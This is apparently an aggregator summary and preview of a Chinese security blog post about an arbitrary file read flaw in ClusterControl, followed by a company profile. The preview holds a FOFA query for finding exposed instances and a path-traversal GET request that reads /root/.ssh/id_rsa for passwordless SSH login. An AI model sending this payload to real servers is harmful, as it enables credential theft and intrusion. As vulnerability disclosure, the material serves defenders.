主要观点总结
本文介绍了关于融云安全的技术文章、ClusterControl工具的漏洞描述、漏洞复现过程以及江西渝融云安全科技有限公司的简介。文章提醒读者仅供参考,并强调未经授权不得利用文章中的技术进行入侵操作。文中提到的ClusterControl工具存在任意文件读取漏洞,可读取公钥进行免密登录。同时,文中提供了对ClusterControl漏洞复现的详细描述,包括使用fofa-query进行搜索、执行poc读取公钥以及使用nuclei验证脚本的步骤。最后,介绍了公司的基本信息和所获得的荣誉资质。
关键观点总结
关键观点1: 融云安全的技术文章提供有关网络安全的信息,供读者参考并使用。
文章明确指出所提供的信息仅用于检测或维护参考,未经授权不得进行入侵操作。
关键观点2: ClusterControl工具存在任意文件读取漏洞。
利用该漏洞可以读取公钥并进行免密登录。文中提供了详细的漏洞复现步骤,包括使用fofa-query搜索、执行poc读取公钥和使用nuclei验证脚本等。
关键观点3: 江西渝融云安全科技有限公司的简介和荣誉。
公司是一家集云安全、物联网安全等为一体的高科技公司,已获得多项资质认证和荣誉,如全国工控安全深度行安全攻防对抗赛三等奖等。
文章预览
0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! ! 0x02 漏洞描述 ClusterControl是一个数据库管理的工具。它用于监控数据库的集群。ClusterControl存在任意文件读取漏洞,可读取公钥进行免密登录。 0x03 漏洞复现 fofa-query: title=ClusterControl v2 1.执行poc进行公钥读取,得到结果 GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1 Host : Accept-Encoding : identity User-Agent : python-urllib3/1.26.4 2.将公钥导入xshell,连接即可 3.nuclei验证脚本已发布于知识星球 nuclei .exe -t
………………………………